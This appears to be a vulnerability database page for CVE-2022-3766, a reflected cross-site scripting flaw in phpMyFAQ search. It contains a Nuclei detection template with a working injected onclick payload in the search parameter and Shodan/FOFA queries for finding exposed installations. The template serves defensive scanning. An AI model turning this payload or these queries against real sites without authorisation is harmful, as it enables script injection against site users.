| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2022-3766 | 31 Oct 202211:15 | – | attackerkb | |
| CVE-2022-3766 | 31 Oct 202213:37 | – | circl | |
| phpMyFAQ 跨站脚本漏洞 | 31 Oct 202200:00 | – | cnnvd | |
| CVE-2022-3766 | 31 Oct 202200:00 | – | cve | |
| CVE-2022-3766 Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq | 31 Oct 202200:00 | – | cvelist | |
| Reflect Cross Site Scripting when search | 20 Oct 202208:50 | – | huntr | |
| phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) | 2 Dec 202500:00 | – | exploitdb | |
| phpMyFAQ vulnerable to reflected Cross-site Scripting | 31 Oct 202212:00 | – | github | |
| CVE-2022-3766 | 31 Oct 202211:15 | – | nvd | |
| phpMyFAQ < 3.1.8 Multiple Vulnerabilities | 3 Nov 202200:00 | – | openvas |
id: CVE-2022-3766
info:
name: phpMyFAQ < 3.1.8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
impact: |
An attacker can Execute arbitrary JavaScript in victim's browser context
remediation: |
Upgrade phpMyFAQ to version 3.1.8 or later
reference:
- https://huntr.dev/bounties/d9666520-4ff5-43bb-aacf-50c8e5570983
- https://github.com/thorsten/phpMyFAQ/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d
- https://nvd.nist.gov/vuln/detail/CVE-2022-3766
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3766
cwe-id: CWE-79
epss-score: 0.05743
epss-percentile: 0.9215
cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: phpmyfaq
product: phpmyfaq
shodan-query: http.html:"phpmyfaq"
fofa-query: body="phpmyfaq"
tags: cve,cve2022,phpmyfaq,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?search=1af%22+onclick%3D'alert(document.domain)'"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "value=\"1af\" onclick='alert(document.domain)'"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100fd77d42f383268e8b74d1919e269141242fe0dd64e2dffe42cc2117123fa3f77022100a2942c0c87e9ee81b3d5c7d85ef0b1edce2d4a5bc677db2f01c7a825b80d3bd0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation